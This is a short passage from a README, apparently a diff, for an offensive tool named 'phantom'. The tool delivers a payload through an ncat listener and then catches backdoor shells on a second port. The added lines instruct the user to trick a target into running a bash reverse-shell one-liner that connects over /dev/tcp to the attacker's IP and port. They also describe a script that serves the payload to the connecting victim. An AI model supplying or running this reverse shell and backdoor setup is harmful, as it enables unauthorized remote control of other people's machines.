konsaranto/phantom/README.md

 *	1st-port: the port that listens for connections to deliver the payload
 *	2nd-port: the port that listens for the backdoor shells after delivering the payload

+You have to somehow make the target execute this code, so that he connects to the 1st-port:
+bash -c 'bash &>/dev/tcp/ip/1st-port 0>&1 &'
+ip and 1st-port are the ones specified above.

 ## Files

 *	phantom-init: Opens an ncat listening process to a predefined ip and port and redirects input to the payload file.